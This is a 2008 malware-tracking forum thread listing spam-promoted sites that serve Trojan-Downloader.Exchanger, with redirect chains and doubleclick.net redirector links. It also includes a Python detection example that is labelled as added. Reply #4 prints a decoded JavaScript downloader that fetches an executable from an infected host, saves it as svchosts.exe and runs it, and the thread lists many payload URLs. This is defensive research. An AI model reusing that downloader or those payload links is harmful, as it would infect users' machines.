Author Topic: Thread about Exchanger sites  (Read 41898 times)

May 28, 2008, 01:24:50 pm

bobby

  • Special Members
  • Hero Member

  • Offline
  • *

  • 322
    • Malzilla
I'll post here the links to sites infected with Trojan-Downloader.Exchanger.xx

I get the links from spam emails. All of the mails are about some video (Britney caught naked etc.)

Code: [Select]
http://thebrits.cl/index.php
>
http://thebrits.cl/pindex.php  < a script, see below
http://thebrits.cl/wamkl.gif
http://thebrits.cl/video_new.exe

http://thebrits.cl/pindex.php
>
http://thebrits.cl//load.php   < exe file

May 28, 2008, 06:30:26 pm
Reply #1

JohnC

  • Special Members
  • Hero Member

  • Offline
  • *

  • 1964

May 28, 2008, 08:42:42 pm
Reply #2

bobby

The list of previous Exchanger URLs (recovered from Malzilla's cache):
Probably all of them are dead by now.

May 28, 2008, 11:59:44 pm
Reply #3

JohnC


May 29, 2008, 01:13:21 pm
Reply #4

bobby

Code: [Select]
http://www.cronicasdecaracas.com/for_y.php
> http://www.cronicasdecaracas.com/main34.html
>>http://www.cronicasdecaracas.com/pindex.php
>>http://www.cronicasdecaracas.com/untitled.gif
>>http://www.cronicasdecaracas.com/for_you.exe

http://www.cronicasdecaracas.com/pindex.php  <-- fake 404 with JS
>http://www.cronicasdecaracas.com//load.php  <-- payload, exe file

Decoded script:

poexali();
function poexali() {
var ender = document.createElement('object');
ender.setAttribute('id','ender');
ender.setAttribute('classid','cl');
var asst = ender.CreateObject('adT','http://www.cronicasdecaracas.com//load.php',false);
asq.send(); asst.open();
asst.Write(asq.responseBody);
var imya = './/..//svchosts.exe';
asst.SaveToFile(imya,2);
asst.Close();
} catch(e) {}
try { ass.shellexecute(imya); } catch(e) {}}
catch(e){}}

May 29, 2008, 08:19:36 pm
Reply #5

bobby

Code: [Select]
http://expotech.es/video.exe

May 29, 2008, 10:29:38 pm
Reply #6

JohnC


May 30, 2008, 12:55:09 pm
Reply #7

bobby

New one.
Code: [Select]
http://ad.doubleclick.net/click;h=nfuit;~sscs=%3fhttp://bottegadelpesto.com/video.exe
This time I gave the link in the form it had in the spam mail.
Earlier links in this thread also contained redirections, but through Google.
This one uses a new redirection, through doubleclick.net.
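
Added example, not part of the original thread and not Malzilla code: a Python check that unwraps spammed links of the `ad.doubleclick.net/click;...;~sscs=%3fhttp://...` form shown in these posts and flags those whose real target is an executable on another host. The function names, the extension list and the `example.test` sample links are assumptions constructed for illustration; the nested target is taken to be the tail of the link, as in the posted form.

```python
import re
from urllib.parse import unquote, urlsplit

# Assumed list of extensions treated as direct executable downloads.
EXECUTABLE_EXT = (".exe", ".scr", ".pif", ".com")
EMBEDDED_URL = re.compile(r"https?://", re.IGNORECASE)
# Constructed sample links; only the ad.doubleclick.net form comes from the thread.
SAMPLE_LINKS = [
    "http://ad.doubleclick.net/click;h=AAAAA;~sscs=%3fhttp://malware.example.test/video.exe",
    "http://ad.doubleclick.net/click;h=BBBBB;~sscs=%253fhttp%253A%252F%252Fsite.example.test%252Fvideo.exe",
    "http://ad.doubleclick.net/click;h=CCCCC;~sscs=%3fhttp://shop.example.test/offer.html",
    "http://news.example.test/video.html",
]


def final_destination(url, max_decode=3):
    """Return the innermost URL carried at the tail of a redirector link."""
    current = url
    for _ in range(max_decode):  # undo nested percent-encoding, bounded
        decoded = unquote(current)
        if decoded == current:
            break
        current = decoded
    starts = [m.start() for m in EMBEDDED_URL.finditer(current)]
    # A match past index 0 means another URL is nested inside the outer link.
    return current[starts[-1]:] if starts and starts[-1] > 0 else current


def classify(url):
    """Describe where a link really leads and whether it fetches an executable."""
    dest = urlsplit(final_destination(url))
    outer_host = (urlsplit(url).hostname or "").lower()
    return {
        "outer_host": outer_host,
        "destination": dest.geturl(),
        "redirected": (dest.hostname or "").lower() != outer_host,
        "executable": dest.path.lower().endswith(EXECUTABLE_EXT),
    }


def flag_links(urls):
    """Links that hide a direct executable download behind another host."""
    results = [classify(u) for u in urls]
    return [r for r in results if r["redirected"] and r["executable"]]


if __name__ == "__main__":
    for hit in flag_links(SAMPLE_LINKS):
        print(hit["outer_host"], "->", hit["destination"])
```

Run over links extracted from a mail gateway or proxy log, this reports the host the recipient sees next to the host that actually serves the file, which is the mismatch the redirection is meant to hide.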

May 30, 2008, 06:17:58 pm
Reply #8

JohnC


May 31, 2008, 06:49:16 am
Reply #9

bobby

Code: [Select]
http://do-haguenau.com/index1.php
>http://do-haguenau.com/main34.html
>>http://do-haguenau.com/pindex.php  <<-- fake 404, JavaScript
>>http://do-haguenau.com/wamkl.gif
>>http://do-haguenau.com/video_film.exe  <<-- payload

http://do-haguenau.com/pindex.php
>http://do-haguenau.com//load.php  <<-- payload

Same scheme as in one of the previous cases.

May 31, 2008, 08:31:28 am
Reply #10

bobby

Code: [Select]
http://www.quinotizie.info/video.exe
Doubleclick.net redirection used
Code: [Select]
http://ad.doubleclick.net/click;h=IKgZj;~sscs=%3fhttp://www.quinotizie.info/video.exe

May 31, 2008, 12:12:01 pm
Reply #11

bobby

Code: [Select]
http://www.blumedit.it/video.exe
Doubleclick.net redirection is used in spammed link:
Code: [Select]
http://ad.doubleclick.net/click;h=SLrjj;~sscs=%3fhttp://www.blumedit.it/video.exe

May 31, 2008, 07:39:54 pm
Reply #12

JohnC


June 01, 2008, 02:17:18 pm
Reply #13

bobby

Code: [Select]
http://clubnauticoliva.com/video.exe
It was using redirection through Doubleclick.net
Code: [Select]
http://ad.doubleclick.net/click;h=FMKqg;~sscs=%3fhttp://clubnauticoliva.com/video.exe

June 01, 2008, 09:37:07 pm
Reply #14

JohnC
